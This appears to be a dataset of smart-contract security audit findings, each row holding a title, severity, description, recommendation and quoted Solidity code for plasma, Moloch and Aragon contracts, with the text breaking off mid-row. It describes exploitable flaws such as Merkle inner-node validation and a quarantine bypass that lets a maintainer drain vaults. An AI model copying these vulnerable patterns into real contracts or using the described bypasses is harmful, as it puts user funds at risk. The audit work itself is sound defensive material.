TxFinalizationModel and TxFinalizationVerifier. Implement stronger checks in Merkle,medium,"`TxFinalizationVerifier` is an abstraction around the block inclusion check needed for many of the features of plasma exit games. It uses a struct defined in `TxFinalizationModel` as inputs to its two functions: `isStandardFinalized` and `isProtocolFinalized`.\\n`isStandardFinalized` returns the result of an inclusion proof. Although there are several branches, only the first is used:\\n```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is ""standard finalized""\\n\\* @dev MVP: requires that both inclusion proof and confirm signature is checked\\n\\* @dev MoreVp: checks inclusion proof only\\n\\*/\\nfunction isStandardFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return checkInclusionProof(data);\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(""MVP is not yet supported"");\\n } else {\\n revert(""Invalid protocol value"");\\n }\\n}\\n```\\n\\n`isProtocolFinalized` is unused:\\n```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is ""protocol finalized""\\n\\* @dev MVP: must be standard finalized\\n\\* @dev MoreVp: allows in-flight tx, so only checks for the existence of the transaction\\n\\*/\\nfunction isProtocolFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return data.txBytes.length > 0;\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(""MVP is not yet supported"");\\n } else {\\n revert(""Invalid protocol value"");\\n }\\n}\\n```\\n\\nThe abstraction used introduces branching logic and requires several files to be visited to fully understand the function of each line of code: `ITxFinalizationVerifier`, `TxFinalizationModel`, `TxPosLib`, `Protocol`, `BlockController`, and `Merkle`. Additionally, the abstraction obfuscates the underlying inclusion proof primitive when used in the exit game contracts. `isStandardFinalized` is not clearly an inclusion proof, and `isProtocolFinalized` simply adds confusion.\\n```\\nfunction checkInclusionProof(Model.Data memory data) private view returns (bool) {\\n if (data.inclusionProof.length == 0) {\\n return false;\\n }\\n\\n (bytes32 root,) = data.framework.blocks(data.txPos.blockNum());\\n bytes32 leafData = keccak256(data.txBytes);\\n return Merkle.checkMembership(\\n leafData, data.txPos.txIndex(), root, data.inclusionProof\\n );\\n}\\n```\\n\\nBy introducing the abstraction of `TxFinalizationVerifier`, the input validation performed by `Merkle` is split across multiple files, and the reasonable-seeming decision of calling `Merkle.checkMembership` directly becomes unsafe. In fact, this occurs in one location in the contracts:\\n```\\nfunction verifyAndDeterminePositionOfTransactionIncludedInBlock(\\n bytes memory txbytes,\\n UtxoPosLib.UtxoPos memory utxoPos,\\n bytes32 root,\\n bytes memory inclusionProof\\n)\\n private\\n pure\\n returns(uint256)\\n{\\n bytes32 leaf = keccak256(txbytes);\\n require(\\n Merkle.checkMembership(leaf, utxoPos.txIndex(), root, inclusionProof),\\n ""Transaction is not included in block of Plasma chain""\\n );\\n\\n return utxoPos.value;\\n}\\n```\\n","PaymentChallengeIFEOutputSpent.verifyInFlightTransactionStandardFinalized:\\n```\\nrequire(controller.txFinalizationVerifier.isStandardFinalized(finalizationData), ""In-flight transaction not finalized"");\\n```\\n\\nPaymentChallengeIFENotCanonical.verifyCompetingTxFinalized:\\n```\\nrequire(self.txFinalizationVerifier.isStandardFinalized(finalizationData), ""Failed to verify the position of competing tx"");\\n```\\n\\nPaymentStartInFlightExit.verifyInputTransactionIsStandardFinalized:\\n```\\nrequire(exitData.controller.txFinalizationVerifier.isStandardFinalized(finalizationData),\\n ""Input transaction is not standard finalized"");\\n```\\n\\nIf none of the above recommendations are implemented, ensure that `PaymentChallengeIFENotCanonical` uses the abstraction `TxFinalizationVerifier` so that a length check is performed on the inclusion proof.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/471",,"```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is ""standard finalized""\\n\\* @dev MVP: requires that both inclusion proof and confirm signature is checked\\n\\* @dev MoreVp: checks inclusion proof only\\n\\*/\\nfunction isStandardFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return checkInclusionProof(data);\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(""MVP is not yet supported"");\\n } else {\\n revert(""Invalid protocol value"");\\n }\\n}\\n```\\n" +Merkle - The implementation does not enforce inclusion of leaf nodes.,medium,"A observation with the current Merkle tree implementation is that it may be possible to validate nodes other than leaves. This is done by providing `checkMembership` with a reference to a hash within the tree, rather than a leaf.\\n```\\n/\\*\\*\\n \\* @notice Checks that a leaf hash is contained in a root hash\\n \\* @param leaf Leaf hash to verify\\n \\* @param index Position of the leaf hash in the Merkle tree\\n \\* @param rootHash Root of the Merkle tree\\n \\* @param proof A Merkle proof demonstrating membership of the leaf hash\\n \\* @return True, if the leaf hash is in the Merkle tree; otherwise, False\\n\\*/\\nfunction checkMembership(bytes32 leaf, uint256 index, bytes32 rootHash, bytes memory proof)\\n internal\\n pure\\n returns (bool)\\n{\\n require(proof.length % 32 == 0, ""Length of Merkle proof must be a multiple of 32"");\\n\\n bytes32 proofElement;\\n bytes32 computedHash = leaf;\\n uint256 j = index;\\n // Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\n for (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(proofElement, computedHash));\\n }\\n j = j / 2;\\n }\\n\\n return computedHash == rootHash;\\n}\\n```\\n\\nThe current implementation will validate the provided “leaf” and return `true`. This is a known problem of Merkle trees https://en.wikipedia.org/wiki/Merkle_tree#Second_preimage_attack.\\nProvide a hash from within the Merkle tree as the `leaf` argument. The index has to match the index of that node in regards to its current level in the tree. The `rootHash` has to be the correct Merkle tree `rootHash`. The proof has to skip the necessary number of levels because the nodes “underneath” the provided “leaf” will not be processed.",A remediation needs a fixed Merkle tree size as well as the addition of a byte prepended to each node in the tree. Another way would be to create a structure for the Merkle node and mark it as `leaf` or no `leaf`.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/425,,"```\\n/\\*\\*\\n \\* @notice Checks that a leaf hash is contained in a root hash\\n \\* @param leaf Leaf hash to verify\\n \\* @param index Position of the leaf hash in the Merkle tree\\n \\* @param rootHash Root of the Merkle tree\\n \\* @param proof A Merkle proof demonstrating membership of the leaf hash\\n \\* @return True, if the leaf hash is in the Merkle tree; otherwise, False\\n\\*/\\nfunction checkMembership(bytes32 leaf, uint256 index, bytes32 rootHash, bytes memory proof)\\n internal\\n pure\\n returns (bool)\\n{\\n require(proof.length % 32 == 0, ""Length of Merkle proof must be a multiple of 32"");\\n\\n bytes32 proofElement;\\n bytes32 computedHash = leaf;\\n uint256 j = index;\\n // Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\n for (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(proofElement, computedHash));\\n }\\n j = j / 2;\\n }\\n\\n return computedHash == rootHash;\\n}\\n```\\n" +Maintainer can bypass exit game quarantine by registering not-yet-deployed contracts,medium,"The plasma framework uses an `ExitGameRegistry` to allow the maintainer to add new exit games after deployment. An exit game is any arbitrary contract. In order to prevent the maintainer from adding malicious exit games that steal user funds, the framework uses a “quarantine” system whereby newly-registered exit games have restricted permissions until their quarantine period has expired. The quarantine period is by default `3 * minExitPeriod`, and is intended to facilitate auditing of the new exit game's functionality by the plasma users.\\nHowever, by registering an exit game at a contract which has not yet been deployed, the maintainer can prevent plasma users from auditing the game until the quarantine period has expired. After the quarantine period has expired, the maintainer can deploy the malicious exit game and immediately steal funds.\\nExplanation\\nExit games are registered in the following function, callable only by the plasma contract maintainer:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, ""Should not register with tx type 0"");\\n require(\\_contract != address(0), ""Should not register with an empty exit game address"");\\n require(\\_exitGames[\\_txType] == address(0), ""The tx type is already registered"");\\n require(\\_exitGameToTxType[\\_contract] == 0, ""The exit game contract is already registered"");\\n require(Protocol.isValidProtocol(\\_protocol), ""Invalid protocol value"");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nNotably, the function does not check the `extcodesize` of the submitted contract. As such, the maintainer can submit the address of a contract which does not yet exist and is not auditable.\\nAfter at least `3 * minExitPeriod` seconds pass, the submitted contract now has full permissions as a registered exit game and can pass all checks using the `onlyFromNonQuarantinedExitGame` modifier:\\n```\\n/\\*\\*\\n \\* @notice A modifier to verify that the call is from a non-quarantined exit game\\n \\*/\\nmodifier onlyFromNonQuarantinedExitGame() {\\n require(\\_exitGameToTxType[msg.sender] != 0, ""The call is not from a registered exit game contract"");\\n require(!\\_exitGameQuarantine.isQuarantined(msg.sender), ""ExitGame is quarantined"");\\n \\_;\\n}\\n```\\n\\nAdditionally, the submitted contract passes checks made by external contracts using the `isExitGameSafeToUse` function:\\n```\\n/\\*\\*\\n \\* @notice Checks whether the contract is safe to use and is not under quarantine\\n \\* @dev Exposes information about exit games quarantine\\n \\* @param \\_contract Address of the exit game contract\\n \\* @return boolean Whether the contract is safe to use and is not under quarantine\\n \\*/\\nfunction isExitGameSafeToUse(address \\_contract) public view returns (bool) {\\n return \\_exitGameToTxType[\\_contract] != 0 && !\\_exitGameQuarantine.isQuarantined(\\_contract);\\n}\\n```\\n\\nThese permissions allow a registered quarantine to:\\nWithdraw any users' tokens from ERC20Vault:\\n```\\nfunction withdraw(address payable receiver, address token, uint256 amount) external onlyFromNonQuarantinedExitGame {\\n IERC20(token).safeTransfer(receiver, amount);\\n emit Erc20Withdrawn(receiver, token, amount);\\n}\\n```\\n\\nWithdraw any users' ETH from EthVault:\\n```\\nfunction withdraw(address payable receiver, uint256 amount) external onlyFromNonQuarantinedExitGame {\\n // we do not want to block exit queue if transfer is unucessful\\n // solhint-disable-next-line avoid-call-value\\n (bool success, ) = receiver.call.value(amount)("""");\\n if (success) {\\n emit EthWithdrawn(receiver, amount);\\n } else {\\n emit WithdrawFailed(receiver, amount);\\n }\\n```\\n\\nActivate and deactivate the `ExitGameController` reentrancy mutex:\\n```\\nfunction activateNonReentrant() external onlyFromNonQuarantinedExitGame() {\\n require(!mutex, ""Reentrant call"");\\n mutex = true;\\n}\\n```\\n\\n```\\nfunction deactivateNonReentrant() external onlyFromNonQuarantinedExitGame() {\\n require(mutex, ""Not locked"");\\n mutex = false;\\n}\\n```\\n\\n`enqueue` arbitrary exits:\\n```\\nfunction enqueue(\\n uint256 vaultId,\\n address token,\\n uint64 exitableAt,\\n TxPosLib.TxPos calldata txPos,\\n uint160 exitId,\\n IExitProcessor exitProcessor\\n)\\n external\\n onlyFromNonQuarantinedExitGame\\n returns (uint256)\\n{\\n bytes32 key = exitQueueKey(vaultId, token);\\n require(hasExitQueue(key), ""The queue for the (vaultId, token) pair is not yet added to the Plasma framework"");\\n PriorityQueue queue = exitsQueues[key];\\n\\n uint256 priority = ExitPriority.computePriority(exitableAt, txPos, exitId);\\n\\n queue.insert(priority);\\n delegations[priority] = exitProcessor;\\n\\n emit ExitQueued(exitId, priority);\\n return priority;\\n}\\n```\\n\\nFlag outputs as “spent”:\\n```\\nfunction flagOutputSpent(bytes32 \\_outputId) external onlyFromNonQuarantinedExitGame {\\n require(\\_outputId != bytes32(""""), ""Should not flag with empty outputId"");\\n isOutputSpent[\\_outputId] = true;\\n}\\n```\\n",`registerExitGame` should check that `extcodesize` of the submitted contract is non-zero.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/410,,"```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, ""Should not register with tx type 0"");\\n require(\\_contract != address(0), ""Should not register with an empty exit game address"");\\n require(\\_exitGames[\\_txType] == address(0), ""The tx type is already registered"");\\n require(\\_exitGameToTxType[\\_contract] == 0, ""The exit game contract is already registered"");\\n require(Protocol.isValidProtocol(\\_protocol), ""Invalid protocol value"");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n" +EthVault - Unused state variable,low,The state variable `withdrawEntryCounter` is not used in the code.\\n```\\nuint256 private withdrawEntryCounter = 0;\\n```\\n,Remove it from the contract.,,```\\nuint256 private withdrawEntryCounter = 0;\\n```\\n +ECDSA error value is not handled,low,"Resolution\\nThis was addressed in commit 32288ccff5b867a7477b4eaf3beb0587a4684d7a by adding a check that the returned value is nonzero.\\nThe OpenZeppelin `ECDSA` library returns `address(0x00)` for many cases with malformed signatures:\\n```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n return address(0);\\n}\\n\\nif (v != 27 && v != 28) {\\n return address(0);\\n}\\n```\\n\\nThe `PaymentOutputToPaymentTxCondition` contract does not explicitly handle this case:\\n```\\naddress payable owner = inputTx.outputs[outputIndex].owner();\\nrequire(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), ""Tx in not signed correctly"");\\n\\nreturn true;\\n```\\n",Adding a check to handle this case will make it easier to reason about the code.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/454,,```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n return address(0);\\n}\\n\\nif (v != 27 && v != 28) {\\n return address(0);\\n}\\n```\\n +No existence checks on framework block and timestamp reads,low,"The exit game libraries make several queries to the main `PlasmaFramework` contract where plasma block hashes and timestamps are stored. In multiple locations, the return values of these queries are not checked for existence.\\nPaymentStartStandardExit.setupStartStandardExitData:\\n```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n\\nPaymentChallengeIFENotCanonical.respond:\\n```\\n(bytes32 root, ) = self.framework.blocks(utxoPos.blockNum());\\n```\\n\\nPaymentPiggybackInFlightExit.enqueue:\\n```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n\\nTxFinalizationVerifier.checkInclusionProof:\\n```\\n(bytes32 root,) = data.framework.blocks(data.txPos.blockNum());\\n```\\n","Although none of these examples seem exploitable, adding existence checks makes it easier to reason about the code. Each query to `PlasmaFramework.blocks` should be followed with a check that the returned value is nonzero.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/463",,"```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n" +BondSize - effectiveUpdateTime should be uint64,low,"In BondSize, the mechanism to update the size of the bond has a grace period after which the new bond size becomes active.\\nWhen updating the bond size, the time is casted as a `uint64` and saved in a `uint128` variable.\\n```\\nuint128 effectiveUpdateTime;\\n```\\n\\n```\\nuint64 constant public WAITING\\_PERIOD = 2 days;\\n```\\n\\n```\\nself.effectiveUpdateTime = uint64(now) + WAITING\\_PERIOD;\\n```\\n\\nThere's no need to use a `uint128` to save the time if it never will take up that much space.",Change the type of the `effectiveUpdateTime` to `uint64`.\\n```\\n- uint128 effectiveUpdateTime;\\n+ uint64 effectiveUpdateTime;\\n```\\n,,```\\nuint128 effectiveUpdateTime;\\n```\\n +PaymentExitGame contains several redundant plasmaFramework declarations,low,"`PaymentExitGame` inherits from both `PaymentInFlightExitRouter` and `PaymentStandardExitRouter`. All three contracts declare and initialize their own `PlasmaFramework` variable. This pattern can be misleading, and may lead to subtle issues in future versions of the code.\\n`PaymentExitGame` declaration:\\n```\\nPlasmaFramework private plasmaFramework;\\n```\\n\\n`PaymentInFlightExitRouter` declaration:\\n```\\nPlasmaFramework private framework;\\n```\\n\\n`PaymentStandardExitRouter` declaration:\\n```\\nPlasmaFramework private framework;\\n```\\n\\nEach variable is initialized in the corresponding file's constructor.",Introduce an inherited contract common to `PaymentStandardExitRouter` and `PaymentInFlightExitRouter` with the `PlasmaFramework` variable. Make the variable internal so it is visible to inheriting contracts.,,```\\nPlasmaFramework private plasmaFramework;\\n```\\n +Creating proposal is not trustless in Pull Pattern,high,"Usually, if someone submits a proposal and transfers some amount of tribute tokens, these tokens are transferred back if the proposal is rejected. But if the proposal is not processed before the emergency processing, these tokens will not be transferred back to the proposer. This might happen if a tribute token or a deposit token transfers are blocked.\\n```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n ""failing vote token transfer failed""\\n );\\n```\\n\\nTokens are not completely lost in that case, they now belong to the LAO shareholders and they might try to return that money back. But that requires a lot of coordination and time and everyone who ragequits during that time will take a part of that tokens with them.","Resolution\\nthis issue no longer exists in the Pull Pattern update, due to the fact that emergency processing and in function ERC20 transfers are removed.\\nPull pattern for token transfers would solve the issue.",,"```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n ""failing vote token transfer failed""\\n );\\n```\\n" +Emergency processing can be blocked in Pull Pattern,high,"The main reason for the emergency processing mechanism is that there is a chance that some token transfers might be blocked. For example, a sender or a receiver is in the USDC blacklist. Emergency processing saves from this problem by not transferring tribute token back to the user (if there is some) and rejecting the proposal.\\n```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n ""failing vote token transfer failed""\\n );\\n```\\n\\nThe problem is that there is still a deposit transfer back to the sponsor and it could be potentially blocked too. If that happens, proposal can't be processed and the LAO is blocked.","Implementing pull pattern for all token withdrawals would solve the problem. The alternative solution would be to also keep the deposit tokens in the LAO, but that makes sponsoring the proposal more risky for the sponsor.",,"```\\nif (!emergencyProcessing) {\\n require(\\n proposal.tributeToken.transfer(proposal.proposer, proposal.tributeOffered),\\n ""failing vote token transfer failed""\\n );\\n```\\n" +Token Overflow might result in system halt or loss of funds,high,"If a token overflows, some functionality such as `processProposal`, `cancelProposal` will break due to safeMath reverts. The overflow could happen because the supply of the token was artificially inflated to oblivion.\\nThis issue was pointed out by Heiko Fisch in Telegram chat.\\nAny function using `internalTransfer()` can result in an overflow:\\n```\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256) {\\n return x >= y ? x : y;\\n}\\n```\\n","We recommend to allow overflow for broken or malicious tokens. This is to prevent system halt or loss of funds. It should be noted that in case an overflow occurs, the balance of the token will be incorrect for all token holders in the system.\\n`rageKick`, `rageQuit` were fixed by not using safeMath within the function code, however this fix is risky and not recommended, as there are other overflows in other functions that might still result in system halt or loss of funds.\\nOne suggestion is having a function named `unsafeInternalTransfer()` which does not use safeMath for the cases that overflow should be allowed. This mainly adds better readability to the code.\\nIt is still a risky fix and a better solution should be planned.",,"```\\nfunction max(uint256 x, uint256 y) internal pure returns (uint256) {\\n return x >= y ? x : y;\\n}\\n```\\n" +Whitelisted tokens limit,high,"`_ragequit` function is iterating over all whitelisted tokens:\\n```\\nfor (uint256 i = 0; i < tokens.length; i++) {\\n uint256 amountToRagequit = fairShare(userTokenBalances[GUILD][tokens[i]], sharesAndLootToBurn, initialTotalSharesAndLoot);\\n // deliberately not using safemath here to keep overflows from preventing the function execution (which would break ragekicks)\\n // if a token overflows, it is because the supply was artificially inflated to oblivion, so we probably don't care about it anyways\\n userTokenBalances[GUILD][tokens[i]] -= amountToRagequit;\\n userTokenBalances[memberAddress][tokens[i]] += amountToRagequit;\\n}\\n```\\n\\nIf the number of tokens is too big, a transaction can run out of gas and all funds will be blocked forever. Ballpark estimation of this number is around 300 tokens based on the current OpCode gas costs and the block gas limit.","A simple solution would be just limiting the number of whitelisted tokens.\\nIf the intention is to invest in many new tokens over time, and it's not an option to limit the number of whitelisted tokens, it's possible to add a function that removes tokens from the whitelist. For example, it's possible to add a new type of proposals, that is used to vote on token removal if the balance of this token is zero. Before voting for that, shareholders should sell all the balance of that token.",,"```\\nfor (uint256 i = 0; i < tokens.length; i++) {\\n uint256 amountToRagequit = fairShare(userTokenBalances[GUILD][tokens[i]], sharesAndLootToBurn, initialTotalSharesAndLoot);\\n // deliberately not using safemath here to keep overflows from preventing the function execution (which would break ragekicks)\\n // if a token overflows, it is because the supply was artificially inflated to oblivion, so we probably don't care about it anyways\\n userTokenBalances[GUILD][tokens[i]] -= amountToRagequit;\\n userTokenBalances[memberAddress][tokens[i]] += amountToRagequit;\\n}\\n```\\n" +Whitelist proposal duplicate Won't Fix,low,"Every time when a whitelist proposal is sponsored, it's checked that there is no other sponsored whitelist proposal with the same token. This is done in order to avoid proposal duplicates.\\n```\\n// whitelist proposal\\nif (proposal.flags[4]) {\\n require(!tokenWhitelist[address(proposal.tributeToken)], ""cannot already have whitelisted the token"");\\n require(!proposedToWhitelist[address(proposal.tributeToken)], 'already proposed to whitelist');\\n proposedToWhitelist[address(proposal.tributeToken)] = true;\\n```\\n\\nThe issue is that even though you can't sponsor a duplicate proposal, you can still submit a new proposal with the same token.",Check that there is currently no sponsored proposal with the same token on proposal submission.,,"```\\n// whitelist proposal\\nif (proposal.flags[4]) {\\n require(!tokenWhitelist[address(proposal.tributeToken)], ""cannot already have whitelisted the token"");\\n require(!proposedToWhitelist[address(proposal.tributeToken)], 'already proposed to whitelist');\\n proposedToWhitelist[address(proposal.tributeToken)] = true;\\n```\\n" +Moloch - bool[6] flags can be changed to a dedicated structure Won't Fix,low,"The Moloch contract uses a structure that includes an array of bools to store a few flags about the proposal:\\n```\\nbool[6] flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n\\nThis makes reasoning about the correctness of the code a bit complicated because one needs to remember what each item in the flag list stands for. The make the reader's life simpler a dedicated structure can be created that incorporates all of the required flags.\\n```\\n bool[6] memory flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n","Based on the provided examples change the `bool[6] flags` to the proposed examples.\\nFlags as bool array with enum (proposed)\\nThis second contract implements the `flags` as a defined structure with each named element representing a specific flag. This method makes clear which flag is accessed because they are referred to by the name, not by the index.\\nThis third contract has the least amount of changes to the code and uses an enum structure to handle the index.\\n```\\npragma solidity 0.5.15;\\n\\ncontract FlagsEnum {\\n struct Proposal {\\n address applicant;\\n uint value;\\n bool[3] flags; // [sponsored, processed, kicked]\\n }\\n \\n enum ProposalFlags {\\n SPONSORED,\\n PROCESSED,\\n KICKED\\n }\\n \\n uint proposalCount;\\n \\n mapping(uint256 => Proposal) public proposals;\\n \\n function addProposal(uint \\_value, bool \\_sponsored, bool \\_processed, bool \\_kicked) public returns (uint) {\\n Proposal memory proposal = Proposal({\\n applicant: msg.sender,\\n value: \\_value,\\n flags: [\\_sponsored, \\_processed, \\_kicked]\\n });\\n \\n proposals[proposalCount] = proposal;\\n proposalCount += 1;\\n \\n return (proposalCount);\\n }\\n \\n function getProposal(uint \\_proposalId) public view returns (address, uint, bool, bool, bool) {\\n return (\\n proposals[\\_proposalId].applicant,\\n proposals[\\_proposalId].value,\\n proposals[\\_proposalId].flags[uint(ProposalFlags.SPONSORED)],\\n proposals[\\_proposalId].flags[uint(ProposalFlags.PROCESSED)],\\n proposals[\\_proposalId].flags[uint(ProposalFlags.KICKED)]\\n );\\n }\\n}\\n```\\n",,"```\\nbool[6] flags; // [sponsored, processed, didPass, cancelled, whitelist, guildkick]\\n```\\n" +Passing duplicate tokens to Redemptions and TokenRequest may have unintended consequences,medium,"Both `Redemptions` and `TokenRequest` are initialized with a list of acceptable tokens to use with each app. For `Redemptions`, the list of tokens corresponds to an organization's treasury assets. For `TokenRequest`, the list of tokens corresponds to tokens accepted for payment to join an organization. Neither contract makes a uniqueness check on input tokens during initialization, which can lead to unintended behavior.\\nIn `Redemptions`, each of an organization's assets are redeemed according to the sender's proportional ownership in the org. The redemption process iterates over the `redeemableTokens` list, paying out the sender their proportion of each token listed:\\n```\\nfor (uint256 i = 0; i < redeemableTokens.length; i++) {\\n vaultTokenBalance = vault.balance(redeemableTokens[i]);\\n\\n redemptionAmount = \\_burnableAmount.mul(vaultTokenBalance).div(burnableTokenTotalSupply);\\n totalRedemptionAmount = totalRedemptionAmount.add(redemptionAmount);\\n\\n if (redemptionAmount > 0) {\\n vault.transfer(redeemableTokens[i], msg.sender, redemptionAmount);\\n }\\n}\\n```\\n\\nIf a token address is included more than once, the sender will be paid out more than once, potentially earning many times more than their proportional share of the token.\\nIn `TokenRequest`, this behavior does not allow for any significant deviation from expected behavior. It was included because the initialization process is similar to that of `Redemptions`.","Resolution\\nThis was addressed in Redemptions commit 2b0034206a5b9cdf239da7a51900e89d9931554f by checking `redeemableTokenAdded[token] == false` for each subsequent token added during initialization. Note that ordering is not enforced.\\nAdditionally, the issue in `TokenRequest` was addressed in commit eb4181961093439f142f2e74eb706b7f501eb5c0 by requiring that each subsequent token added during initialization has a value strictly greater than the previous token added.\\nDuring initialization in both apps, check that input token addresses are unique. One simple method is to require that token addresses are submitted in ascending order, and that each subsequent address added is greater than the one before.",,"```\\nfor (uint256 i = 0; i < redeemableTokens.length; i++) {\\n vaultTokenBalance = vault.balance(redeemableTokens[i]);\\n\\n redemptionAmount = \\_burnableAmount.mul(vaultTokenBalance).div(burnableTokenTotalSupply);\\n totalRedemptionAmount = totalRedemptionAmount.add(redemptionAmount);\\n\\n if (redemptionAmount > 0) {\\n vault.transfer(redeemableTokens[i], msg.sender, redemptionAmount);\\n }\\n}\\n```\\n" +The Delay app allows scripts to be paused even after execution time has elapsed,medium,"The `Delay` app is used to configure a delay between when an evm script is created and when it is executed. The entry point for this process is `Delay.delayExecution`, which stores the input script with a future execution date:\\n```\\nfunction \\_delayExecution(bytes \\_evmCallScript) internal returns (uint256) {\\n uint256 delayedScriptIndex = delayedScriptsNewIndex;\\n delayedScriptsNewIndex++;\\n\\n delayedScripts[delayedScriptIndex] = DelayedScript(getTimestamp64().add(executionDelay), 0, \\_evmCallScript);\\n\\n emit DelayedScriptStored(delayedScriptIndex);\\n\\n return delayedScriptIndex;\\n}\\n```\\n\\nAn auxiliary capability of the `Delay` app is the ability to “pause” the delayed script, which sets the script's `pausedAt` value to the current block timestamp:\\n```\\nfunction pauseExecution(uint256 \\_delayedScriptId) external auth(PAUSE\\_EXECUTION\\_ROLE) {\\n require(!\\_isExecutionPaused(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_PAUSE);\\n delayedScripts[\\_delayedScriptId].pausedAt = getTimestamp64();\\n\\n emit ExecutionPaused(\\_delayedScriptId);\\n}\\n```\\n\\nA paused script cannot be executed until `resumeExecution` is called, which extends the script's `executionTime` by the amount of time paused. Essentially, the delay itself is paused:\\n```\\nfunction resumeExecution(uint256 \\_delayedScriptId) external auth(RESUME\\_EXECUTION\\_ROLE) {\\n require(\\_isExecutionPaused(\\_delayedScriptId), ERROR\\_CAN\\_NOT\\_RESUME);\\n DelayedScript storage delayedScript = delayedScripts[\\_delayedScriptId];\\n\\n uint64 timePaused = getTimestamp64().sub(delayedScript.pausedAt);\\n delayedScript.executionTime = delayedScript.executionTime.add(timePaused);\\n delayedScript.pausedAt = 0;\\n\\n emit ExecutionResumed(\\_delayedScriptId);\\n}\\n```\\n\\nA delayed script whose execution time has passed and is not currently paused should be able to be executed via the `execute` function. However, the `pauseExecution` function still allows the aforementioned script to be paused, halting execution.",Add a check to `pauseExecution` to ensure that execution is not paused if the script's execution delay has already transpired.,,"```\\nfunction \\_delayExecution(bytes \\_evmCallScript) internal returns (uint256) {\\n uint256 delayedScriptIndex = delayedScriptsNewIndex;\\n delayedScriptsNewIndex++;\\n\\n delayedScripts[delayedScriptIndex] = DelayedScript(getTimestamp64().add(executionDelay), 0, \\_evmCallScript);\\n\\n emit DelayedScriptStored(delayedScriptIndex);\\n\\n return delayedScriptIndex;\\n}\\n```\\n" +Misleading intentional misconfiguration possible through misuse of newToken and newBaseInstance,medium,"The instantiation process for a Dandelion organization requires two separate external calls to `DandelionOrg`. There are two primary functions: `installDandelionApps`, and `newTokenAndBaseInstance`.\\n`installDandelionApps` relies on cached results from prior calls to `newTokenAndBaseInstance` and completes the initialization step for a Dandelion org.\\n`newTokenAndBaseInstance` is a wrapper around two publicly accessible functions: `newToken` and `newBaseInstance`. Called together, the functions:\\nDeploy a new `MiniMeToken` used to represent shares in an organization, and cache the address of the created token:\\n```\\n/\\*\\*\\n\\* @dev Create a new MiniMe token and save it for the user\\n\\* @param \\_name String with the name for the token used by share holders in the organization\\n\\* 